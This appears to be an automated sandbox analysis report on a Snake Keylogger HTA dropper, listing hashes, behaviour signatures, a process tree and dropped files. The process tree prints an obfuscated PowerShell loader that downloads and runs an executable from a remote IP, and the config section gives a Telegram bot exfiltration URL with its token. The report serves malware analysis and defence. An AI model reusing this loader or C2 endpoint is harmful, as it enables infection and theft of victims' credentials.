Overview

overview

10

Static

static

1

4e7237c56c...68.hta

windows7-x64

10

4e7237c56c...68.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    16s
  • max time network
    112s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    16-10-2024 01:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta

  • Size

    165KB

  • MD5

    44ad3c49b38f4f6f1739baf86d528fd3

  • SHA1

    afcf27df0ee2373846a1f6b8027e9cfcea77c486

  • SHA256

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

  • SHA512

    e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691

  • SSDEEP

    96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Score
10/10
snakekeyloggercollectiondefense_evasiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
      "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2252
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2892
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_99j9dfn.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6BC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA6BB.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2776
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2100

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESA6BC.tmp
    Filesize

    1KB

    MD5

    ed2baaffc4fc083f868c04c033c7a66d

    SHA1

    1a25db2a8ea9acad652a0762a98187dd59c06569

    SHA256

    158739f824ae8962a3fdcefd28378a9609b7fad46690b8b1921d7fb2916cff0a

    SHA512

    e46c3fe4328f3b42845b8ac86ee21bd28cc38a2e261c390f81ea83b7a45de33c01b2c0376ea4602cbf451f68e8cda129e81ed4da280a6a4d6f57d61d232b387b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_99j9dfn.dll
    Filesize

    3KB

    MD5

    2ea51eefa730542821fd43a352c193b4

    SHA1

    fea0eb88d22d35b16e0ee79e28e5a2134cec1650

    SHA256

    8ca6b70d0e7706fa03a4808cf3643eb9870bbc7d0a8e09e371e1e08e126420d8

    SHA512

    670384971c88b162efb250c5aef1aa81a3ad509344051c4bf9255d2e67b3c296ef9908431733127a30c6f1a7e1276cd0f7c169fa6297aa4f2e894e6502a5bf2f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\_99j9dfn.pdb
    Filesize

    7KB

    MD5

    b7ba7fdf0ab8286e9039693f6d582d80

    SHA1

    1a7b717fe061c656dd7b33501add0a33edab9ef9

    SHA256

    a4a958148add2d50d8c545641d0abe4823e6824092c82619f01a3db1a7c4c3b5

    SHA512

    7ca66f30eec0caeb5e99c102509ea1b38957be36b66c3657e1f4d66deff4c3a414c334f2dc811b93b5f6b3bf37db803ebd537e26ecfe4aef50be78f821e80d5f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    6093d9d65098cad1a18f64e698d15d64

    SHA1

    785b2728821e483ce886306c5c09cef431dba41e

    SHA256

    fcb9dac2d9d9ba8b84495fd817780b22a80b1ee109d44e7d2c2c08a334b933b2

    SHA512

    d2ffc707af256c5de051434baa8c733567b72956e682091b48486d9e93df60ea8f812e0b0dcecea9a1c4d02c1d457ee2582764e25adb6ec64e73356e96b1d486

    Download Submit

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe
    Filesize

    948KB

    MD5

    3e2f27edd3deacd8f08f6ed1133b2040

    SHA1

    060e3218949c5a006bb8607e8228e6539b737bfb

    SHA256

    163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

    SHA512

    da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCA6BB.tmp
    Filesize

    652B

    MD5

    cd4b415852ddd09d6e7d143d0a00f56d

    SHA1

    6fad24bc27d4e5c8f590f34c1910507b5b3f8f9a

    SHA256

    ad16e1d3a0b09073b10837e6a923965dcf72a374cc30bbfd8cc651e3db41d896

    SHA512

    5260fa480bc4c81d7165bf27ea7464952192bd063b56301646a22411da452622768b4aca6c3eaea449a2ae7e627c3ea5c19c4320e8c5eed9bbc545b5d11540e3

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\_99j9dfn.0.cs
    Filesize

    475B

    MD5

    ecc2c10cb4c5954e2d5156bce54e41f4

    SHA1

    2d7cde31f9942c1dc80c493c03d675962991bf31

    SHA256

    21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

    SHA512

    bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\_99j9dfn.cmdline
    Filesize

    309B

    MD5

    a1afc9ecf40afd1c5576603a221009c1

    SHA1

    74d4eea41de07b2aaf098f37ebe86f470189ced3

    SHA256

    1cf344dbc2e6dd2b6c4bd43a47c68ad30681e935e9d579e3bd7e491de5faa865

    SHA512

    8b11fc8c9000f22b3379d73c6cda66661d5b2c0725d133346984121f38d442e85218f06d502c0bf0bc9505e8d6a391289e539c94f48a9feeec922ea016775efb

    Download Submit

  • memory/2100-36-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2100-35-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2100-34-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download